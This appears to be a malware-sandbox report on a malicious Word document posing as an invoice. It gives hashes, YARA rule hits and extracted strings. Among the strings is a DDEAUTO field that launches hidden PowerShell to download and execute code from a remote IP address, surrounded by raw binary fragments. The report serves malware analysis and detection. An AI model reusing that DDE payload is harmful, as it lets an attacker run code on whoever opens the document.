Sample details: 52c7a36e5ca4ef535f3004aaf7f37d09 --

Hashes
MD5: 52c7a36e5ca4ef535f3004aaf7f37d09
SHA1: 1becfd5918ae039a7de1420ce1694b2861be858e
SHA256: 0a920b13c28f53c16540e9b69d2a81e734b1917d68f454822b6616959b4ff62d
SSDEEP: 3072:TTVZ4LGydDKaoWCNas98Os1iTFvAOuE6mMvECJOU+JV:TD4Sy0xNJ98OsoC/YCJOU+JV
Details
File Type: Composite
Added: 2018-05-11 13:37:14
Yara Hits
YRP/powershell | YRP/domain | YRP/IP | YRP/url | YRP/contentis_base64 | YRP/maldoc_OLE_file_magic_number | YRP/Antivirus | YRP/VMWare_Detection | FlorianRoth/PowerShell_Susp_Parameter_Combo | FlorianRoth/Suspicious_PowerShell_WebDownload_1 |
Strings
		DDEAUTO "C:\\Programs\\Microsoft\\Office\\MSWord.exe\\..\\..\\..\\..\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe -NoP -sta -NonI -W Hidden -c IEX ((New-Object System.Net.WebClient).DownloadString('http://88.99.104.179:1985/win_update/upgrade')) # " " protected mode " \* MERGEFORMAT 
IDATx^
;"#23r
gok[9d
>%~xV=
8;"v=i
*}Me[h
cfXi[B
LtT)AY$gU
hJ5_MB
s\ 4^M
ba)"bb
dM.Hm&
76io5E
0k,|$CSQ
M,mPWyG
6UMNW${
e7'\$B
3z5&12
+k:Y1N
xH#S9b
Cx?a89
<GXn\:Hcm
gX4V!{I
9G4HeI:K
qA;(f|m
9oRF%{Q
'5V<&l
Nb/U{b
)FF-BR
)?G-^Q
s])[N|
0zc>4=6
s{Z6z-
}RjU}n
|l{MCP
>P s9!
!'Y)#g-oV
1JgdGv
9wx\U[;
u_F3y#
)S?q[C
+1e^-D
)N@Fz1
x'(?V$
KbkG	7n
fXnGr{}
f"<~.?G?
\/Uci`
!CRg5U
u9lf)(s
=5vzLl
,r:'`m!
{H7(|k
)2HmBp
0&" f=M
pv;U[jEh
(k7N;G
Y<6Jwu
:2h79&
}o]~wooO
cAr(hW
1=+^ag
$y"1}L
+TFp|~I&%<>e
wsfN,o
l 'yD^
v}jN,P
l 'i,E
Y~vu]\
)9_{{|
Cqqq&C
usv^,ofe
Nny|r,H
5GI+9y%
.Y6pmK
3-?cG^
VVBn7O`GI
	yI"`^
ba}E<T
:)8A(g
I;Rgrg
Wu}SUO
61!^#]
)]wgqI,P
[bmgOlS~
:7pL1v
?nMOQ%
`{yZl.N
bkeFl.M
3;Cd %
	JB:NG
JnM-e!
#.#xHy
w$+~0QyvL
qvr@%7
|'2<3=
}'=Y=r
:b?x+C>
S3S8m@
	ppj_AR
~5'22;
x:(Q4H
~9.sN-
`[Fql`q2
X19RlE
YOQ{O<^
h%i;z-KX?V
a_yq		P8
#@$IBI\&
d"pxmq
v|wq| .
_PS'=Y
u1/[_pt 
LBM;I`N
M>vhE=
:~M;~,
nw|mB-
q5{p>c
J<>?2#+g
Bd`5{]
bqfB-_-x
D@#0=5=
nT[.BD
$@_GQx
QN?d;G
OhU0i\
V+j!u%
<b	@{N
;G?7uo]
%ul;@?
G,7![-G
+tjMVt
Q\)vG]
`|`,y		
.%E{9/
g+RnY~
-kk4"*
v(\gU;6
hyqW";.
F'Cge!
pKq>BNS
980.SV
sI@7$c*
{n?U%t}z
!=Ta.4
9	$]c;
\iNiw@>
#{l9B;
c@xWRK
?xg{E+
gkX+"@
M1{'UFBc&
n[RV*\
1X'd34
!d;z)z
NBFvsV
Wv>yhb
%f^K}g
L]\}_6nQ7
rd3UNp
>M>cMz
L*&.-g
1.|X{'(
"W6)L-
xWQl='
9-DNljO
)SjAbE+
PD~l">6
MwO"p/
I&T8TZ
L34a:$I2)
Ip`9FBt
:uJis/ur
x}R&'=
V0cdC_b
ocIDAT
qiOP.[nH
L;|u3c
8jpVP'
,'qf2;
@e+:[=
r:"Gis$
hsA+Of
Q=>p;a
b	[UKB
i?2HF|
$:&u7n
:&NA4c }3
DtAet6
e}`&y:z
^+[d[.Y
N3:$1M:[p
.0|l"i
 Mj^aq
N?J5buu
A{4Pe}
\EnSAj
T/,iq:
>Ibezc
RGk8h;'r:
fe+e&|
^gX/9_
auNt}"
gOJ'63<
':8m}+
He+}Zm
W3Hbo*
S0JHIyU
AR_NhC
/G^)3m
CO*{0:>Q
V{{9&<
CNN6vM
\?ktWf
`jBG+x
`jBG+x
Package
Package
Invoice.lnk
C:\Users\root\Downloads\Invoice.lnk
C:\Users\root\AppData\Local\Temp\Invoice.lnk
Windows
System32
WINDOW~1
powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Normal
Microsoft Office Word
 Microsoft Office Word 9j
[Content_Types].xml
_rels/.rels
theme/theme/themeManager.xml
theme/theme/theme1.xml
|#67_*-
3^q5'=q6
q=xK@;)
&&CLgM
theme/theme/_rels/themeManager.xml.rels
K(M&$R(.1
[Content_Types].xmlPK
_rels/.relsPK
theme/theme/themeManager.xmlPK
theme/theme/theme1.xmlPK
theme/theme/_rels/themeManager.xml.relsPK
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<a:clrMap xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
7-2003
MSWordDoc
Word.Document.8